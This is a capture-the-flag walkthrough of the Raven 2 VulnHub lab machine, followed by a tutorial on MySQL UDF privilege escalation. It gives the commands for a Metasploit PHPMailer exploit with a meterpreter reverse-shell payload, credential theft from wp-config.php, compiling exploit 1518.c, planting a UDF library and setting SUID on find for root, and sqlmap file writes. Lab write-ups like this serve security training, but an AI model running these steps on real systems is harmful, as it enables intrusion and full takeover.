Article directory
Preface
Difficulty: Medium. The goal is to obtain four flags and download the ova file. This article uses VirtualBox to open it. The download address is: https://www.vulnhub.com/entry/raven-2,269/. The knowledge points involved in this article include: building a target environment, using the dirsearch tool, DS_Store information leakage vulnerability, using wpscan, using the PHPMailer command execution vulnerability to obtain a shell, and UDF privilege escalation. .
Target drone address: 192.168.56.107
kali address: 192.168.56.108
1. Install the target drone
1) Select Management-Import virtual machine computer.
2) Select the file path to which RAVEN: 2 downloaded.
3) Select Import to install into a blank folder.
4) Select Host Network Manager.
5) Choose to manually configure the network card.
6) Choose to enable and configure the DHCP server.
7) The network card 1 of the target machine and kali are both set to host-only mode.
8) Kali's network card 2 is set to NAT mode, because sometimes there is a need for networking.
2. Web part
1) Use nmap to scan the network segment to obtain the target IP address, and find 192.168.56.107, which is determined to be the target machine address. Note: 192.168.56.100 is the IP address of the DHCP server set on this machine.
# -sn 只做ping扫描,不做端口扫描
# -PE 使用icmp协议请求包发现主机
# -n 不进行反向DNS解析
nmap -sn -PE -n 192.168.56.0/24
2) Use nmap to scan the port. The results are as follows:
nmap -A -T4 -p- 192.168.56.107
3) First access port 80 and use dirsearch to scan the directory, then click around to have a look. When you click on BLOG, you will jump to the WordPress interface. Take note of it.
4) The directory scan results are as follows. Found many directories, check them one by one.
5) A directory traversal vulnerability was found in the http://192.168.56.107/vendor/ directory, and the first flag was found in the PATH file.
6) The word PHPMailer was also found in the readme file. From the VERSION file, it can be seen that the version is 5.2.16. After searching, it was found that PHPMailer is a PHP function package for sending emails. You can send it directly using PHP, without building a complicated email service. There is also a remote command execution vulnerability. Please note it and test whether there is a historical vulnerability later.
7) The .DS_Store information was also discovered to be leaked, but there was no valid information. Utilization tool address: https://github.com/lijiejie/ds_store_exp.
8) http://192.168.56.107/wordpress/wp-login.php, found the WordPress login interface, and found that the website could not be found.
9) Use the wpscan leak scanning tool to detect whether there are historical vulnerabilities in WordPress. wpscan is a built-in tool in kali. Please note that wpscan requires an Internet connection to be used. You can find a lot of information, but there is nothing to gain permission.
10) Take another look at the PHPMailer information collected before. Search the Internet to see if there are any historical vulnerabilities in PHPMailer. If you find that there are historical vulnerabilities, use MSF to search. There are two. We use info 0 and info 1 according to the prompts to check and describe the situation. We found that the first one is suitable. We previously found that the version at this time was 5.2.16, which was just smaller than 5.2.18.
search phpmailer
info 0
use 0
11) Take advantage of it and see what needs to be set.
12) Compared with Baidu’s tutorial, configure the parameters according to the requirements. First configure the IP and email function page and absolute path of the target machine. After viewing the settings, you can find that the IP of the kali rebound shell is in the network segment 10. Because it is a dual network card, we put The ip of the rebound shell is set to 192.168.56.107. After that, the configuration is completed and the ports are all defaulted.
options
set RHOSTS 192.168.56.107 #靶机地址
set TARGETURI /contact.php #邮件功能页面
set WEB_ROOT /var/www/html #网站绝对路径
set payload php/meterpreter/reverse_tcp #设置payload
set LHOST 192.168.56.108 #kali地址
run
13) Copy YNz20r0P.php and splice it into the URL and then access it. You can successfully rebound the shell, but it is very slow!
http://192.168.56.107/YNz20r0P.php
14) You can see the flag2.txt file under the /var/www path.
15) The metrtpreter command is inconvenient to use, so we directly switch to shell form. Then we searched for all flags and found flag3. We found that it was a picture that we directly spliced together and accessed.
find ./ -name "flag*"
http://192.168.56.107/wordpress/wp-content/uploads/2018/11/flag3.png
16) Use python to bounce the interactive shell in one sentence.
python -c 'import pty; pty.spawn("/bin/bash")'
17) Then search the configuration files globally and find four and check them one by one.
find ./ -name "*fig*"
18) The mysql database account password was found in the wp-config.php file: root/R@v3nSecurity.
cat html/wordpress/wp-config.php
19) Use your account and password to successfully log in to the database.
mysql -uroot -pR@v3nSecurity
3. Rights escalation part
1) For vulnerabilities in MYSQL below 5.5, you can use UDF to escalate privileges and check the running permissions of mysql. It is found that mysqld has root permissions. Check the setting of secure_file_priv and find that it is empty, which satisfies the udf privilege escalation.
ps -aux|grep mysql #查看mysql的运行权限
select version(); #查看mysql版本
select @@basedir; #确认mysql安装位置
show variables like '%basedir%'; #确认mysql安装位置
show variables like '%secure%'; #查看可导出文件位置
2) For versions of MySQL >= 5.1, the UDF dynamic link library file must be placed in the folder under the lib\plugin folder in the MySQL installation directory to create a custom function. Both sqlmap and Metasploit come with dynamic link library files corresponding to the system. Check the plug-in location: /usr/lib/mysql/plugin/. For Windows, you also need to check the operating system version.
show variables like '%plugin%'; #查找插件位置
show variables like '%compile%'; #查看系统版本
3) From the above information, it can be seen that the udf privilege escalation is satisfied. Directly use 1518 to escalate the privilege. First search for 1518.c, then check its location, and copy it to a directory that is convenient for operation. I created a new directory and can copy it directly to the desktop.
searchsploit 1518.c #搜索1518.c
locate 1518.c #查看下本地所存放路径
cp /usr/share/exploitdb/exploits/linux/local/1518.c . #复制到当前所在文件夹
4) Use gcc to compile and generate the 1518.so file.
#参数:-g 生成调试信息
-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。
-o:执行命令后的文件名
-lc:-l 库 c库名
-Wl选项告诉编译器将后面的参数传递给链接器。
-soname则指定了动态库的soname(简单共享名,Short for shared object name)
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
5) Transfer the ".so" file to the /tmp directory on the target machine. Use python to start the http service on kali. In the obtained shell, switch to the tmp directory and use the wget command to download the 1518.so file.
6) Log in to mysql again and use the following command to create a custom function.
# 连接mysql数据库
mysql -uroot -pR@v3nSecurity
# 使用mysql数据库
use mysql;
# 创建foo表
create table foo(line blob);
# 往foo表中插入二进制的1518.so
insert into foo values(load_file('/tmp/1518.so'));
# 导出1518.so
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
# 创建do_system自定义函数
create function do_system returns integer soname '1518.so';
# 调用do_system函数给find命令所有者的suid权限,使其执行root
select do_system('chmod u+s /usr/bin/find');
# 导入成功后可查看一下 mysql 函数里面是否新增了do_system:
select * from mysql.func;
7) Use find to name and execute whoami, and find that it currently has root permissions.
find 11 -exec "whoami" \;
find 11 -exec "/bin/sh" \;
8) Use the find command to obtain a shell with root permissions and search for flag4.
4. Extra MySQL privilege escalation - UDF privilege escalation
1. Prerequisites for using UDF rights promotion
1) The secure_file_priv item of the mysql configuration file is set to empty (if the directory is specified as NULL or /tmp/, etc., that is, the udf file export location cannot be customized and cannot be used).
2) CREATE permissions and FILE permissions (the root user has all permissions by default).
3) The Linux system requires write permission for the plugin directory.
4) UDF privilege escalation in the Linux environment is most likely limited to the shooting range environment. The reason: under the strict system permissions of Linux, the mysql user or web user does not have write permission to the plugin directory.
# 查看当前数据库用户权限
select * from mysql.user where user = substring_index(user(), '@', 1)\G;
2. Find the dynamic link library
1) In Windows, Mysql is generally executed with System permissions. Therefore, the UDF privilege escalation vulnerability occurs mainly because the root user password is leaked, weak passwords, etc., or ordinary users have write permissions to folders such as plugins.
2) Mysql's main program mysqld in Linux environment generally runs with the independent account mysql, while the daemon mysqld_safe has root permissions. Therefore, there are relatively few opportunities for UDF privilege escalation under Linux. UDF privilege escalation will only occur when the mysqld process is executed as root.
3) For versions of MySQL >= 5.1, the UDF dynamic link library file must be placed in the folder under the lib\plugin folder in the MySQL installation directory to create a custom function. Generally, sqlmap and Metasploit come with dynamic link library files corresponding to the system. However, these dynamic link libraries included in sqlmap have been encoded to prevent accidental killing and cannot be used directly. However, you can use the decoding tool cloak.py that comes with sqlmap to decode it.
4) UDF dynamic link library file location of sqlmap:
sqlmap根目录/data/udf/mysql
The location of cloak.py:
/extra/cloak/cloak.py
The decoding method is as follows:
# 解码 32 位的 Linux 动态链接库
python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so
# 解码 64 位的 Linux 动态链接库
python3 cloak.py -d -i ../../data/udf/mysql/linux/64/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so
# 解码 32 位的 Windows 动态链接库
python3 cloak.py -d -i ../../data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll
# 解码 64 位的 Windows 动态链接库
python3 cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
5) Metasploit’s UDF dynamic link library file location:
sqlmap根目录/data/udf/mysql
The dynamic link library file that comes with Metasploit does not need to be decoded and can be used directly.
3. Find the plug-in location
1) The following is to put the UDF dynamic link library file in the plug-in directory of MySQL. When logging in to MySQL, you can query it with MySQL statements.
show variables like '%plugin%';
2) If it does not exist, you can find the MySQL installation directory in webshell and create the \lib\plugin folder manually. The MySQL installation directory can be found through the select @@basedir; statement.
select 233 into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$index_allocation';
3) When the lib\plugin directory exists and there is a webshell, upload the udf file directly. When the lib\plugin directory exists but there is no webshell, you need to write the udf file in hexadecimal encoding.
4. Write to the dynamic link library
1) Writing to the dynamic link library can be divided into the following situations. The first one is: SQL injection and high permissions. The plugin directory is writable and requires secure_file_priv without restrictions. The MySQL plug-in directory can be written by the MySQL user. At this time, You can directly use sqlmap to upload the dynamic link library, and because GET has a byte length limit, this attack can often be performed only through POST injection.
# --file-write=本地文件路径
# --file-dest 写入目标路径
sqlmap -u "http://localhost:30008/" --data="id=1" --file-write="/Users/sec/Desktop/lib_mysqludf_sys_64.so" --file-dest="/usr/lib/mysql/plugin/udf.so"
2) Without injection, native SQL statements can be operated. In this case, when secure_file_priv is unlimited, we can also manually write files to the plugin directory.
# 直接 SELECT 查询十六进制写入
SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
You can use the hex function that comes with MySQL to get hexadecimal.
# 直接传入路径编码
SELECT hex(load_file('/lib_mysqludf_sys_64.so'));
# 也可以将路径 hex 编码
SELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f));
3) If you encounter this error, it may be because the use of lib_mysqludf_sys_64.dll failed, and the use of lib_mysqludf_sys_32.dll will succeed, so the dll here should have nothing to do with the number of system bits, and may be related to the installation version of MySQL, and PHPStudy comes with it The version of MySQL is 32-bit.
ERROR 1126 (HY000): Can't open shared library 'udf.dll' (errno: 193 )
5. Create custom functions and call commands
1) You can use the following command in MySQL,
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
2) After the import is successful, check whether sys_eval is added in the mysql function.
select * from mysql.func;
3) Afterwards, you can execute system commands through the created function. If you are under a Windows system, it should have the highest permissions.
select sys_eval('whoami');
6. Delete custom functions
1) Use the following command in MySQL to delete the custom function.
drop function sys_eval;